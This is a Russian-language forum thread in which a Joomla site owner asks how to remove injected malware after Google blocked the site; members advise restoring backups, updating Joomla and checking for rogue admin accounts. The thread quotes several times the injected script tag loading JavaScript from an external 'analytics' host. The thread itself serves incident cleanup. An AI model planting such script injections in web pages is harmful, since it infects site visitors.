Вредоносный объект

  • 20 Ответов
  • 747 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

Вредоносный объект
« : 06.07.2016, 15:16:00 »
Добрый день! Подскажите пожалуйста, где искать код для удаления в isp менеджере, в файле index.php нет этого кода. Сайт перестал работать, нужно почистить данный код. Надеюсь на понимание.
Внедрение вредоносного кода,http://goproject.pro/index.php,05.07.16,"""<script language=""""JavaScript"""" type=""""text/JavaScript"""" src=""""http://realstatistics.pro/js/analytics.php?id=123"""">"""

*

Оффлайн draff

  • *******
  • 2739
  • [+]174 / [-]5
  • step by step
    • Просмотр профиля
Re: Вредоносный объект
« Ответ #1 : 06.07.2016, 15:41:22 »
index.php не обязательно. МОжет быть и в системных файлах. Если переключить на стандартный шаблон?

Re: Вредоносный объект
« Ответ #2 : 06.07.2016, 16:02:18 »
Подскажите пожалуйста пошагово, если возможно, как искать. Таких файлов у меня с десяток Google обнаружил.

Re: Вредоносный объект
« Ответ #3 : 06.07.2016, 16:04:01 »
Внедрение вредоносного кода,http://goproject.pro/index.php/proekty,05.07.16,"""<script language=""""JavaScript"""" type=""""text/JavaScript"""" src=""""http://realstatistics.pro/js/analytics.php?id=123"""">"""

Внедрение вредоносного кода,https://goproject.pro/index.php/proekty.html,05.07.16,"""<script language=""""JavaScript"""" type=""""text/JavaScript"""" src=""""http://realstatistics.pro/js/analytics.php?id=123"""">"""

Внедрение вредоносного кода,http://www.goproject.pro/index.php/,05.07.16,"""<script language=""""JavaScript"""" type=""""text/JavaScript"""" src=""""http://realstatistics.pro/js/analytics.php?id=123"""">"""

Re: Вредоносный объект
« Ответ #4 : 06.07.2016, 16:21:03 »
В который раз не может форум помочь! Простые люди пишут, не все профессионалы! Кто вообще главный здесь! Зачем форум создаётся? Для игнора?

*

Оффлайн Olg

Re: Вредоносный объект
« Ответ #5 : 06.07.2016, 16:31:19 »
Прежде чем истерить -- 1.

*

Оффлайн pavelrer

Re: Вредоносный объект
« Ответ #6 : 06.07.2016, 17:36:37 »
Ну искать можно очень долго и упорно! Особенно если не знаешь, что искать и где.
Данный код может быть зашифрован, разорван на переменные, и раскидан абсолютно в любые файлы, причем даже php код можно разобрать по буквачкам и привет.
Так, что быстро сами не найдете (тут уж извините), причем с таким подходом!



Дайте хоть пациента то!
Пройдитесь айболитом, посмотрите что пишет.

Цитировать
Кто вообще главный здесь!
;D Главный - Я!  ;D Все остальные мои помощники!  ;D


Re: Вредоносный объект
« Ответ #7 : 06.07.2016, 18:04:39 »
Подход нормальный, несколько раз вручную вычищал файлы, но с такой ситуацией еще не сталкивался. Google блокирует сайт, указывая вот такие пути:
распространяющий вредоносное ПО.
Подробности
URL страниц с проблемами Время последнего обнаружения
http://goproject.pro/ 06.07.16
http://goproject.pro/index.php 05.07.16
https://goproject.pro/ 05.07.16
https://goproject.pro/index.php 05.07.16
http://goproject.pro/index.php/ 05.07.16
http://goproject.pro/index.php/18-slider.html 05.07.16
http://goproject.pro/index.php/32-icons.html 05.07.16
http://goproject.pro/index.php/proekty 05.07.16
http://goproject.pro/index.php/proekty.html 05.07.16
https://goproject.pro/index.php/proekty.html 05.07.16


*

Оффлайн pavelrer

Re: Вредоносный объект
« Ответ #8 : 06.07.2016, 18:08:26 »
Joomla то-какая?

Поднять из backup можете?

Re: Вредоносный объект
« Ответ #9 : 06.07.2016, 18:17:02 »
Joomla! 3.3.3 Stablе, сейчас пытаюсь поднять бэкап за более раннюю дату. После этого в Google нужно отправлять запрос на разблокировку ресурса, они пишут что это может занимать до нескольких часов

*

Оффлайн draff

  • *******
  • 2739
  • [+]174 / [-]5
  • step by step
    • Просмотр профиля
Re: Вредоносный объект
« Ответ #10 : 06.07.2016, 18:32:48 »
Google будет показывают много страниц, а код генерируется в одном файле.
Нужно обновляться до Joomla 3.5.1. Но если нет опыта чистки, то после обновления Joomla и всех используемых расширений, установить чистую Joomla и расширения и подключить старую базу данных. И проверить сколько супер-админов в админке сайта- "левых"- удалить

Re: Вредоносный объект
« Ответ #11 : 06.07.2016, 18:46:43 »
Спасибо, так скорее всего и сделаем чтобы не ковыряться. На данный момент сайт заработал, помогло восстановление бэкапа за более раннюю дату а так же письмо в Google для ускорения процесса проверки. Будем снова принимать меры, менять пароли пока, искать уязвимость. еще раз всем спасибо! Все на футбол, тему можно закрыть.  *DRINK*

*

Оффлайн pavelrer

Re: Вредоносный объект
« Ответ #12 : 06.07.2016, 19:11:18 »
Joomla обновить обзательно

Re: Вредоносный объект
« Ответ #13 : 06.07.2016, 19:12:13 »
Хорошо!

Re: Вредоносный объект
« Ответ #14 : 06.07.2016, 19:13:43 »
Вот что мне пишет Joomla, кстати. У вас уже установлена последняя версия Joomla!, 3.3.3.

Re: Вредоносный объект
« Ответ #15 : 06.07.2016, 19:14:47 »
Так извините, кэш оказывается надо обновить.

*

Оффлайн pavelrer

Re: Вредоносный объект
« Ответ #16 : 06.07.2016, 19:21:37 »
Цитировать
Так извините, кэш оказывается надо обновить.
  ;D

Может потереть?

http://joomlaportal.ru/news/general/2591-reliz-bezopasnosti-dlya-joomla-1-5-x-2-5-x-3-4-x

*

Оффлайн pavelrer

Re: Вредоносный объект
« Ответ #17 : 06.07.2016, 19:22:34 »
3.3 Дырявая

*

Оффлайн robert

Re: Вредоносный объект
« Ответ #18 : 06.07.2016, 19:25:55 »
В который раз не может форум помочь! Простые люди пишут, не все профессионалы! Кто вообще главный здесь!
Какого черта, куда вы пришли с хозяйскими замашками? Хоть в сотый раз. Кто сказал, что здесь все профессионалы и все обязаны бросаться вам помогать при первом чихе?
Зачем форум создаётся? Для игнора?
Да, вас - точно.
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.

Re: Вредоносный объект
« Ответ #19 : 06.07.2016, 20:31:05 »
Не хотел никого обидеть, непрофессионал - имел в виду себя, а так же парочку людей в подобных темах. Никак ни уважаемых профи.  Проблема решена, я предлагаю не дискутировать более на тему того сообщения, если это возможно.

Re: Вредоносный объект
« Ответ #20 : 06.07.2016, 20:32:21 »
3.3 Дырявая

Искренне хочется верить, что новая версия лучше!